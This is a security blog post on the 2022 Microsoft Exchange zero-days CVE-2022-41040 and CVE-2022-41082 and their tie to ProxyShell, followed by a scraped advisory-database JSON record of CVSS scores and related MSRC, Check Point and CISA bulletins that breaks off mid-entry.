On September 29, Microsoft security researchers announced two new zero-day vulnerabilities, CVE-2022-41040 and CVE-2022-41082 affecting Microsoft Exchange Server. The vulnerabilities allow remote code execution (RCE) when used in tandem. It is important to note that both require authenticated access to the desired server before exploitation. Trend Micro gave the two vulnerabilities severity ratings of 8.8 and 6.3 out of 10, respectively.
According to researchers, CVE-2022-41082 is closely related to the [ProxyShell](<https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>) vulnerability from 2021, CVE-2021-34473. The request string disclosed from the recent exploit is identical to that of last year’s vulnerability, and the mitigation provided by Microsoft is the same as well.
Imperva Threat Research has observed considerable related attacker activity targeting last year’s ProxyShell vulnerability (CVE-2021-34473) recently. Threat Research rules and policies may also be picking up attacks targeting the new exploits (CVE-2022-41040 and CVE-2022-41082).
[GTSC](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>), the company who discovered these vulnerabilities in August, believes that a Chinese threat actor may be behind the attacks observed so far. Per GTSC, the attacks include a Chinese character encoding and the China Chopper webshell for persistent remote access, which is a backdoor commonly used by likely state-sponsored Chinese hacking groups.
Given existing blocking rules that mitigate the CVE-2021-34473 proxyshell vulnerabilities, these new CVEs are mitigated out of the box by both Imperva Cloud WAF and WAF Gateway. If customers wish to implement a manual mitigation based on the advisory from Microsoft, it can be found [here](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). Microsoft noted that the CVEs only impact on-premise Exchange servers, so Exchange Online Customers do not currently need to take any action.
As always, Imperva Threat Research continues to monitor the situation and will provide updates as new information emerges.
The post [Microsoft Exchange Server Vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.imperva.com/blog/microsoft-exchange-server-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) appeared first on [Blog](<https://www.imperva.com/blog>).
{"id": "IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C", "vendorId": null, "type": "impervablog", "bulletinFamily": "blog", "title": "Microsoft Exchange Server Vulnerabilities CVE-2022-41040 and CVE-2022-41082", "description": "On September 29, Microsoft security researchers announced two new zero-day vulnerabilities, CVE-2022-41040 and CVE-2022-41082 affecting Microsoft Exchange Server. The vulnerabilities allow remote code execution (RCE) when used in tandem. It is important to note that both require authenticated access to the desired server before exploitation. Trend Micro gave the two vulnerabilities severity ratings of 8.8 and 6.3 out of 10, respectively.\n\nAccording to researchers, CVE-2022-41082 is closely related to the [ProxyShell](<https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>) vulnerability from 2021, CVE-2021-34473. The request string disclosed from the recent exploit is identical to that of last year\u2019s vulnerability, and the mitigation provided by Microsoft is the same as well.\n\nImperva Threat Research has observed considerable related attacker activity targeting last year\u2019s ProxyShell vulnerability (CVE-2021-34473) recently. Threat Research rules and policies may also be picking up attacks targeting the new exploits (CVE-2022-41040 and CVE-2022-41082).\n\n[GTSC](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>), the company who discovered these vulnerabilities in August, believes that a Chinese threat actor may be behind the attacks observed so far. Per GTSC, the attacks include a Chinese character encoding and the China Chopper webshell for persistent remote access, which is a backdoor commonly used by likely state-sponsored Chinese hacking groups.\n\nGiven existing blocking rules that mitigate the CVE-2021-34473 proxyshell vulnerabilities, these new CVEs are mitigated out of the box by both Imperva Cloud WAF and WAF Gateway. If customers wish to implement a manual mitigation based on the advisory from Microsoft, it can be found [here](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). Microsoft noted that the CVEs only impact on-premise Exchange servers, so Exchange Online Customers do not currently need to take any action.\n\nAs always, Imperva\u200b\u200b Threat Research continues to monitor the situation and will provide updates as new information emerges.\n\nThe post [Microsoft Exchange Server Vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.imperva.com/blog/microsoft-exchange-server-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "published": "2022-09-30T16:47:34", "modified": "2022-09-30T16:47:34", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.imperva.com/blog/microsoft-exchange-server-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "reporter": "Gabi Stapel", "references": [], "cvelist": ["CVE-2021-34473", "CVE-2022-41040", "CVE-2022-41082"], "immutableFields": [], "lastseen": "2022-10-13T02:05:20", "viewCount": 1432, "enchantments": {"score": {"value": 1.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:0287B84AF09C377FDC8D475774722858"]}, {"type": "attackerkb", "idList": ["AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:9EA74C88-E0C0-4B13-802D-551307F35B3F", "AKB:B18222FB-1EF5-4D55-899B-61BD7ECF0FAA", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC"]}, {"type": "avleonov", "idList": ["AVLEONOV:4E65E4AC928647D5E246B06B953BBC6F", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34"]}, {"type": "cert", "idList": ["VU:915563"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0476", "CPAI-2022-0628"]}, {"type": "cisa", "idList": ["CISA:8C51810D4AACDCCDBF9D526B4C21660C", "CISA:8ED5E84007437E9B88D2418732B63E04"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-34473", "CISA-KEV-CVE-2022-41040", "CISA-KEV-CVE-2022-41082"]}, {"type": "cnvd", "idList": ["CNVD-2022-67837", "CNVD-2022-67838"]}, {"type": "cve", "idList": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473", "CVE-2022-41040", "CVE-2022-41082"]}, {"type": "fireeye", "idList": ["FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "githubexploit", "idList": ["031A1BA5-EA1C-586D-8614-7558CCA5FCCB", "04705DD0-6F67-5847-B368-4ADB734EC12B", "0A015784-48D7-5DC1-9FB9-416A9BBEA6D5", "0AA01487-E0E5-59CB-9A45-A5DE55F290A6", "0E54CE3B-3E70-59B7-BB6B-AC20C8611B38", "17DBAF5D-D221-53A1-8663-721B510E680E", "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "2DFE744C-4369-56D5-9FEA-348B4150C298", "3410A018-A761-5411-8E58-892F756D299A", "346026AA-22B5-5F79-9544-28E8E7CFE3F2", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "480AA36A-BFDC-54DD-AE13-43A3FE97ADCE", "4AC49DB9-A784-561B-BF92-94209310B51B", "553EF29F-6CB4-5F8F-91AD-85FC945A94E0", "58C7CDFB-F328-57B4-ACE6-CA3966DB0EEB", "5C16D945-0879-5E51-B2AF-B106F633656A", "6064317C-299E-530F-81F1-F80C282AE68A", "6776EABD-28C1-5A42-8AB2-27BD7F492078", "6E208382-5651-5649-B6C1-F9EF3A08EA81", "87179042-CF32-5495-87D0-B916B42259D2", "9905FF79-0EE2-5313-9486-DA71B70A3D88", "9945D2DB-9314-5400-8C2B-94D4BD603DD9", "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "B6C642BC-915E-52EA-80B0-BC40EDC884CC", "B8464218-31FA-569A-AC74-26B347DEC285", "BC7AA745-CDB6-554E-B6CC-A50E97B7ECE5", "CF3485E1-2E99-580B-BC50-D61EA587BA40", "D52F3F41-2E8A-5FC2-AA35-BC6707158F1A", "D58D53CD-D047-5570-B473-DEFF8E3B0225", "E4395A48-164E-527F-8B5B-1A44D3F379B6", "E458F533-4B97-51A1-897B-1AF58218F2BF", "F00E8BE4-12D2-5F5B-A9AA-D627780259FB", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "FE6D7F99-F6AF-559F-93A5-786367B77158"]}, {"type": "hackread", "idList": ["HACKREAD:E34C6E8908AE56B0B1176B1237BFDF36"]}, {"type": "hivepro", "idList": ["HIVEPRO:09525E3475AC1C5F429611A90182E82F", "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "HIVEPRO:186D6EE394314F861D57F4243E31E975", "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "HIVEPRO:B4C85BEFF3E49468BE44E35CEC3A7DE6", "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:F2305684A25C735549865536AA4254BF"]}, {"type": "kaspersky", "idList": ["KLA12224", "KLA19264"]}, {"type": "krebs", "idList": ["KREBS:6E25B247DFBFC9267C00F36CE0695768", "KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:A165959E3A462AF8315F01F1020BBF53", "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:DDF3883C3A8B9A70629872FE83522C17"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:C857BFAD4920FD5B25BF42D5469945F6"]}, {"type": "mscve", "idList": ["MS:CVE-2021-31196", "MS:CVE-2021-31206", "MS:CVE-2021-34473", "MS:CVE-2022-41040", "MS:CVE-2022-41082"]}, {"type": "mskb", "idList": ["KB5001779"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:C857BFAD4920FD5B25BF42D5469945F6"]}, {"type": "nessus", "idList": ["EXCHANGE_CVE-2022-41040_IOC.NBIN", "EXCHANGE_PROXYSHELL.NBIN", "SMB_NT_MS21_APR_EXCHANGE.NASL", "SMB_NT_MS22_OCT_EXCHANGE_ZERODAY.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163895"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:89B0E9C4C12FFA944639C5B7B34594DB", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D", "QUALYSBLOG:F062F85432853297A014064EA7A5C183"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "RAPID7BLOG:90A5B4252807D9A3550CB8449AA62109", "RAPID7BLOG:B37CF2E44EB6AA38B417BB09297CD3E1", "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720"]}, {"type": "securelist", "idList": ["SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "talosblog", "idList": ["TALOSBLOG:12103F398364269083FD96139F0F6562", "TALOSBLOG:A0B0983119E043D75EA7712A7172A942"]}, {"type": "thn", "idList": ["THN:0521233945B9471C64D546BD2B006823", "THN:0D80EEB03C07D557AA62E071C7A7C619", "THN:5293CFD6ACCF7BFD2EDDE976C7C06C15", "THN:54023E40C0AA4CB15793A39F3AF102AB", "THN:5BE77895D84D1FB816C73BB1661CE8EB", "THN:6B72050A86FFDCE9A0B2CF6F44293A1B", "THN:802C6445DD27FFC7978D22CC3182AD58", "THN:8200D2C2E1DD329D680C5E699177551B", "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:A5B36072ED31304F26AF0879E3E5710E", "THN:C3B82BB0558CF33CFDC326E596AF69C4", "THN:E95B6A75073DA71CEC73B2E4F0B13622", "THN:FA40708E1565483D14F9A31FC019FCE1"]}, {"type": "threatpost", "idList": ["THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:52923238811C7BFD39E0529C85317249", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "THREATPOST:836083DB3E61D979644AE68257229776", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496"]}, {"type": "zdi", "idList": ["ZDI-21-821"]}, {"type": "zdt", "idList": ["1337DAY-ID-36667"]}]}, "epss": [{"cve": "CVE-2021-34473", "epss": "0.974090000", "percentile": "0.998470000", "modified": "2023-03-19"}, {"cve": "CVE-2022-41040", "epss": "0.951500000", "percentile": "0.988580000", "modified": "2023-03-19"}, {"cve": "CVE-2022-41082", "epss": "0.970140000", "percentile": "0.995460000", "modified": "2023-03-19"}], "vulnersScore": 1.2}, "_state": {"score": 1684015195, "dependencies": 1665628910, "epss": 1679305349}, "_internal": {"score_hash": "c982fd6c6b0c0ecd10bdbf8f73202f72"}}
{"checkpoint_advisories": [{"lastseen": "2022-10-04T15:20:24", "description": "A remote code execution vulnerability exists in Microsoft Exchange. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2022-41082; CVE-2022-41040)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-04T00:00:00", "id": "CPAI-2022-0628", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-04T10:05:38", "description": "A remote code execution vulnerability exists in Microsoft Exchange. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2021-34473; CVE-2021-34523)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-09-30T00:00:00", "id": "CPAI-2021-0476", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2023-06-03T15:13:34", "description": "November 8, 2022 update - Microsoft released security updates for CVE-2022-41040 and CVE-2022-41082. We recommend that customers protect their organizations by applying the updates immediately to affected systems. The options described in the Mitigations section are no longer recommended. For more information, review the Exchange Team blog. Summary Summary On November 8 Microsoft released security updates for two zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T07:00:00", "type": "msrc", "title": "Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T07:00:00", "id": "MSRC:644966B4D83B650C284EC9D93664582D", "href": "/blog/2022/09/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-11-08T18:46:25", "description": "November 8, 2022 update - Microsoft released security updates for CVE-2022-41040 and CVE-2022-41082. We recommend that customers protect their organizations by applying the updates immediately to affected systems. The options described in the Mitigations section are no longer recommended. For more information, review the Exchange Team blog. Summary On November 8 Microsoft released security updates \u2026\n\n[ Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server Read More \u00bb](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T06:55:00", "type": "msrc", "title": "Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T06:55:00", "id": "MSRC:4F7507AA26F4DEB78152DE764136012C", "href": "https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-11T21:15:42", "description": "November 8, 2022 update - Microsoft released security updates for CVE-2022-41040 and CVE-2022-41082. We recommend that customers protect their organizations by applying the updates immediately to affected systems. The options described in the Mitigations section are no longer recommended. For more information, review the Exchange Team blog. Summary Summary On November 8 Microsoft released security updates for two zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T07:00:00", "type": "msrc", "title": "Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T07:00:00", "id": "MSRC:87D7D0E827E89DC02EC00DFCF04D1B34", "href": "https://msrc.microsoft.com/blog/2022/09/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T15:35:29", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:C28CD823FBB321014DB6D53A28DA0CD1", "href": "/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-22T16:39:48", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:8F98074A1D86F9B965ADC16597E286ED", "href": "https://msrc.microsoft.com/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-10-03T13:58:18", "description": "Microsoft has released [Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). According to the blog post, \u201cMicrosoft is aware of limited targeted attacks using the two vulnerabilities to get into users\u2019 systems.\u201d The two vulnerabilities are CVE-2022-41040 and CVE-2022-41082, affecting on-premises Microsoft Exchange Server 2013, 2016, and 2019. **Note:** Microsoft Exchange Online is not affected. \n\nAn attacker could exploit these vulnerabilities to take control of an affected system.\n\nCISA encourages users and administrators to review the following information from Microsoft and apply the necessary mitigations until patches are made available:\n\n * [Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>)\n * [Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/09/30/microsoft-releases-guidance-zero-day-vulnerabilities-microsoft>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "cisa", "title": "Microsoft Releases Guidance on Zero-Day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-01T00:00:00", "id": "CISA:8ED5E84007437E9B88D2418732B63E04", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/09/30/microsoft-releases-guidance-zero-day-vulnerabilities-microsoft", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-08-22T22:07:03", "description": "Malicious cyber actors are actively exploiting the following ProxyShell vulnerabilities: [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>), and [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>). An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine. CISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply [Microsoft's Security Update from May 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/11/microsoft-releases-may-2021-security-updates>)\u2014which remediates all three 